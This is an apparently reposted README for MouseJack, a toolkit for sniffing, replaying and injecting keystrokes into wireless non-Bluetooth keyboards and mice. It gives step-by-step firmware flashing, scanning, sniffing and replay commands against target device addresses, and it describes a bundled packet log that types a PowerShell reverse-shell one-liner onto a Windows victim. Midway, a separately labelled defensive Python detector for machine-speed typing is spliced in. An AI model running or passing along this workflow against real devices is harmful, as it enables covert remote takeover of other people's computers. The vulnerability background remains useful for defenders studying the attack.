MouseJack – A Tool To Hijack Wireless Mouse And Keyboard With Replay/Transmit PoC


MouseJack is a dangerous tool: with it an attacker can hijack a wireless mouse or keyboard and do serious harm on the target computer, which matters all the more now that so many people use wireless mice and keyboards. The attacker can take control of the target computer from a distance. Learn how attackers work so that you can protect yourself.

What Is MouseJack?

MouseJack is a class of vulnerabilities that affects the vast majority of wireless, non-Bluetooth keyboards and mice. These peripherals are ‘connected’ to a host computer using a radio transceiver, commonly a small USB dongle. Since the connection is wireless, and mouse movements and keystrokes are sent over the air, it is possible to compromise a victim’s computer by transmitting specially-crafted radio signals using a device which costs as little as $15.

An attacker can launch the attack from up to 100 meters away. The attacker is able to take control of the target computer without physically being in front of it, and can type arbitrary text or send scripted commands. It is therefore possible to rapidly perform malicious activities without being detected.

The MouseJack exploit centers around injecting unencrypted keystrokes into a target computer. Mouse movements are usually sent unencrypted, while keystrokes are often encrypted (to prevent eavesdropping on what is being typed). However, the MouseJack vulnerability takes advantage of affected receiver dongles and their associated software, allowing unencrypted keystrokes transmitted by an attacker to be passed on to the computer’s operating system as if the victim had legitimately typed them.
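As an added illustration (not part of the original write-up or the tool), one defender-side consequence of the above: injected keystrokes arrive at machine speed, far faster than a human can type. The Python below flags runs of keystrokes whose inter-key gaps all fall below a threshold, run over a constructed event timeline; the thresholds and sample data are assumptions for this example, not values from the page.

```python
"""Typing-rate heuristic for spotting injected keystrokes.

Injected keystrokes arrive at machine speed, while a human rarely sustains
more than roughly 10-15 keys per second. A run of keystrokes whose gaps are
all below a small threshold is therefore worth alerting on.
Thresholds and sample data are constructed for this example.
"""
from dataclasses import dataclass
from typing import Iterable, List


@dataclass
class Burst:
    start: float  # timestamp (seconds) of the first key in the run
    end: float    # timestamp of the last key in the run
    count: int    # number of keystrokes in the run

    def keys_per_second(self) -> float:
        return (self.count - 1) / (self.end - self.start)


def find_injection_bursts(timestamps: Iterable[float],
                          max_gap: float = 0.02,
                          min_run: int = 10) -> List[Burst]:
    """Return runs of >= min_run keystrokes with every gap <= max_gap.

    max_gap=0.02 s corresponds to 50 keys/s, well above human typing speed
    (assumed threshold). Timestamps are sorted so out-of-order events are
    tolerated.
    """
    ts = sorted(timestamps)
    bursts: List[Burst] = []
    run_start = 0
    for i in range(1, len(ts) + 1):
        # A run ends at the end of input or when the gap exceeds max_gap.
        if i == len(ts) or ts[i] - ts[i - 1] > max_gap:
            if i - run_start >= min_run:
                bursts.append(Burst(ts[run_start], ts[i - 1], i - run_start))
            run_start = i
    return bursts


# Constructed timeline: five human keystrokes, then 25 injected keystrokes
# 4 ms apart (250 keys/s), then two more human keystrokes.
SAMPLE_EVENTS = ([0.00, 0.18, 0.35, 0.61, 0.77]
                 + [5.0 + 0.004 * k for k in range(25)]
                 + [9.0, 9.3])

if __name__ == "__main__":
    for b in find_injection_bursts(SAMPLE_EVENTS):
        print(f"burst of {b.count} keys from {b.start:.3f}s to {b.end:.3f}s "
              f"({b.keys_per_second():.0f} keys/s)")
```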
 
For more information on the MouseJack vulnerability, you can watch the video, read the MouseJack technical white paper, and view the list of affected devices.

The public advisories can be found here, and have been registered with CERT.

Source Code

This is code extending the mousejack tools https://github.com/RFStorm/mousejack.
Replay/transmit tools have been added to the original tools.
POC packets based on a Logitech Wireless Combo MK220 which consists of a K220 wireless keyboard and an M150 wireless mouse are included in the logs folder.
More details available here https://www.ckn.io/blog/2016/07/09/hijacking-wireless-mice-and-keyboards/

Install & Setup

Requirements

  • SDCC (minimum version 3.1.0)
  • GNU Binutils
  • Python
  • PyUSB
  • platformio

Install dependencies on Ubuntu:

$ sudo apt-get install sdcc binutils python python-pip
$ sudo pip install -U pip
$ sudo pip install -U -I pyusb
$ sudo pip install -U platformio

Supported Hardware

The following hardware has been tested and is known to work.

  • CrazyRadio PA USB dongle
  • SparkFun nRF24LU1+ breakout board
  • Logitech Unifying dongle (model C-U0007, Nordic Semiconductor based)

Initialize the submodule

$ git submodule init
$ git submodule update

Build the firmware

$ cd nrf-research-firmware
$ make

Flash over USB

nRF24LU1+ chips come with a factory programmed bootloader occupying the topmost 2KB of flash memory. The CrazyRadio firmware and RFStorm research firmware support USB commands to enter the Nordic bootloader.

Dongles and breakout boards can be programmed over USB if they are running one of the following firmwares:

  • Nordic Semiconductor Bootloader
  • CrazyRadio Firmware
  • RFStorm Research Firmware

To flash the firmware over USB:

$ cd nrf-research-firmware
$ sudo make install

Flash a Logitech Unifying dongle

The most common Unifying dongles are based on the nRF24LU1+, but some use chips from Texas Instruments. This firmware is only supported on the nRF24LU1+ variants, which have a model number of C-U0007. The flashing script will automatically detect which type of dongle is plugged in, and will only attempt to flash the nRF24LU1+ variants.

To flash the firmware over USB onto a Logitech Unifying dongle:

$ cd nrf-research-firmware
$ sudo make logitech_install

Flash a Logitech Unifying dongle back to the original firmware

Download and extract the Logitech firmware image, which will be named RQR_012_005_00028.hex or similar. Then, run the following command to flash the Logitech firmware onto the dongle:

$ cd nrf-research-firmware
$ sudo ./prog/usb-flasher/logitech-usb-restore.py [path-to-firmware.hex]

Flash over SPI using a Teensy

If your dongle or breakout board is bricked, you can alternatively program it over SPI using a Teensy.

This has only been tested with a Teensy 3.1/3.2, but is likely to work with other Arduino variants as well.

Build and Upload the Teensy Flasher

$ cd nrf-research-firmware
$ platformio run --project-dir teensy-flasher --target upload

Connect the Teensy to the nRF24LU1+

[Figure: wiring diagram for connecting the Teensy to the nRF24LU1+]

Flash the nRF24LU1+

$ cd nrf-research-firmware
$ sudo make spi_install

Usage

scanner

Pseudo-promiscuous mode device discovery tool, which sweeps a list of channels and prints out decoded Enhanced Shockburst packets.

usage: ./nrf24-scanner.py [-h] [-c N [N ...]] [-v] [-l] [-p PREFIX] [-d DWELL]

optional arguments:
  -h, --help                          show this help message and exit
  -c N [N ...], --channels N [N ...]  RF channels
  -v, --verbose                       Enable verbose output
  -l, --lna                           Enable the LNA (for CrazyRadio PA dongles)
  -p PREFIX, --prefix PREFIX          Promiscuous mode address prefix
  -d DWELL, --dwell DWELL             Dwell time per channel, in milliseconds

Scan for devices on channels 1-5

$ ./nrf24-scanner.py -c {1..5}

Scan for devices with an address starting in 0xA9 on all channels

$ ./nrf24-scanner.py -p A9

sniffer

Device-following sniffer, which follows a specific nRF24 device as it hops and prints out decoded Enhanced Shockburst packets from the device. This version has also been modified to log the packets to a log file.

usage: ./nrf24-sniffer.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS -o OUTPUT [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] 
 
optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Address to sniff, following as it changes channels
  -o OUTPUT, --output OUTPUT                 Output file to log the packets
  -t TIMEOUT, --timeout TIMEOUT              Channel timeout, in milliseconds
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15] 

Sniff packets from address 8C:D3:0F:3E:B4 on all channels and save them to output.log

$ ./nrf24-sniffer.py -a 8C:D3:0F:3E:B4 -o logs/output.log

replay/transmit

Replay captured packets or transmit generated ones. It follows a specific nRF24 device as it hops, and sends packets from a log file.

usage: ./nrf24-replay.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS -i INPUT_FILE [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] 
 
optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Address to sniff, following as it changes channels
  -i INPUT_FILE, --input INPUT_FILE          Input file that has the packets to send
  -t TIMEOUT, --timeout TIMEOUT              Channel timeout, in milliseconds
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15] 

Send packets from the file keystroke.log to address 8C:D3:0F:3E:B4, following the device as it hops between channels

$ ./nrf24-replay.py -a 8C:D3:0F:3E:B4 -i logs/keystroke.log

network mapper

Star network mapper, which attempts to discover the active addresses in a star network by changing the last byte in the given address, and pinging each of 256 possible addresses on each channel in the channel list.

usage: ./nrf24-network-mapper.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS [-p PASSES] [-k ACK_TIMEOUT] [-r RETRIES]
 
optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Known address
  -p PASSES, --passes PASSES                 Number of passes (default 2)
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15] 

Map the star network that address 61:49:66:82:03 belongs to

$ ./nrf24-network-mapper.py -a 61:49:66:82:03

continuous tone test

The nRF24LU1+ chips include a test mechanism to transmit a continuous tone, the frequency of which can be verified if you have access to an SDR. There is the potential for frequency offsets between devices to cause unexpected behavior. For instance, one of the SparkFun breakout boards that was tested had a frequency offset of ~300kHz, which caused it to receive packets on two adjacent channels.

This script will cause the transceiver to transmit a tone on the first channel that is passed in.

usage: ./nrf24-continuous-tone-test.py [-h] [-c N [N ...]] [-v] [-l]
 
optional arguments:
  -h, --help                          show this help message and exit
  -c N [N ...], --channels N [N ...]  RF channels
  -v, --verbose                       Enable verbose output
  -l, --lna                           Enable the LNA (for CrazyRadio PA dongles) 

Transmit a continuous tone at 2405MHz

$ ./nrf24-continuous-tone-test.py -c 5

packet generator script

This uses a dictionary to map keyboard presses to the equivalent packets. It reads stdin input and logs the mapped packets to logs/keystrokes.log. It will accept input until Ctrl+C is pressed.

usage: ./keymapper.py

Log files

The folder logs contains various pre-saved packets for various keyboard operations.
Shell.log is for exploitation of a Windows machine by running a PowerShell one-liner which connects back to the attacker machine.

The file keys.log serves as a reference where various key presses and combinations are mapped to their equivalent packets.

Demo

A demo of exploiting a Windows machine can be found here:

